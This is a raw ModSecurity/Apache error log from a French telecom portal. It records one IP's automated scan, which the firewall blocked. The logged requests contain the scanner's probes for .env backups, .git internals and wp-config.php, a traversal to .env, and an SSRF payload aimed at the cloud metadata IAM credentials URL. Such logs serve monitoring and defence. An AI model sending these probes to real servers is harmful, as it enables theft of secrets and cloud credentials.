[Mon May 11 15:23:18.693205 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYRlchVQ3tCn0m9OpZcAAAARE"]
[Mon May 11 15:23:18.697611 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRqO9RdIr1DwxYR2TBQAAAMw"]
[Mon May 11 15:23:18.697742 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU2wAAAJM"]
[Mon May 11 15:23:18.697800 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRqO9RdIr1DwxYR2TBQAAAMw"]
[Mon May 11 15:23:18.697873 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU2wAAAJM"]
[Mon May 11 15:23:18.698469 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRqO9RdIr1DwxYR2TBQAAAMw"]
[Mon May 11 15:23:18.699137 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRqy-5-wpj6Sx56aZEQAAABA"]
[Mon May 11 15:23:18.699278 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRqy-5-wpj6Sx56aZEQAAABA"]
[Mon May 11 15:23:18.699425 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcgAAAQM"]
[Mon May 11 15:23:18.699479 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRqy-5-wpj6Sx56aZEQAAABA"]
[Mon May 11 15:23:18.699563 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcgAAAQM"]
[Mon May 11 15:23:18.699746 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcgAAAQM"]
[Mon May 11 15:23:18.700304 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRuSQ-m-m0ukSShuCRwAAAVI"]
[Mon May 11 15:23:18.699845 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRuSQ-m-m0ukSShuCRgAAAVA"]
[Mon May 11 15:23:18.700427 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRuSQ-m-m0ukSShuCRwAAAVI"]
[Mon May 11 15:23:18.700470 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRuSQ-m-m0ukSShuCRgAAAVA"]
[Mon May 11 15:23:18.700633 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRuSQ-m-m0ukSShuCRwAAAVI"]
[Mon May 11 15:23:18.693904 2026] [proxy_fcgi:error] [pid 1320398:tid 1320407] [client 195.178.110.133:3884] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.700987 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRuSQ-m-m0ukSShuCRgAAAVA"]
[Mon May 11 15:23:18.701354 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU2wAAAJM"]
[Mon May 11 15:23:18.702873 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRqt2WtvoFr7xvGzU3QAAAJQ"]
[Mon May 11 15:23:18.703010 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRqt2WtvoFr7xvGzU3QAAAJQ"]
[Mon May 11 15:23:18.703940 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRqO9RdIr1DwxYR2TBgAAANc"]
[Mon May 11 15:23:18.704070 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRqO9RdIr1DwxYR2TBgAAANc"]
[Mon May 11 15:23:18.704288 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRqO9RdIr1DwxYR2TBgAAANc"]
[Mon May 11 15:23:18.704506 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYRqt2WtvoFr7xvGzU3QAAAJQ"]
[Mon May 11 15:23:18.710849 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcwAAARE"]
[Mon May 11 15:23:18.710991 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcwAAARE"]
[Mon May 11 15:23:18.711198 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRlchVQ3tCn0m9OpZcwAAARE"]
[Mon May 11 15:23:18.712250 2026] [security2:error] [pid 1319998:tid 1320014] [client 195.178.110.133:3976] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRqt2WtvoFr7xvGzU3wAAAI4"]
[Mon May 11 15:23:18.712329 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.712854 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRuSQ-m-m0ukSShuCSAAAAUk"]
[Mon May 11 15:23:18.712979 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRuSQ-m-m0ukSShuCSAAAAUk"]
[Mon May 11 15:23:18.712981 2026] [security2:error] [pid 1319998:tid 1320014] [client 195.178.110.133:3976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRqt2WtvoFr7xvGzU3wAAAI4"]
[Mon May 11 15:23:18.713204 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYRuSQ-m-m0ukSShuCSAAAAUk"]
[Mon May 11 15:23:18.716880 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqy-5-wpj6Sx56aZEwAAABA"]
[Mon May 11 15:23:18.716946 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqy-5-wpj6Sx56aZEwAAABA"]
[Mon May 11 15:23:18.716987 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4AAAAJM"]
[Mon May 11 15:23:18.717069 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqy-5-wpj6Sx56aZEwAAABA"]
[Mon May 11 15:23:18.717173 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4AAAAJM"]
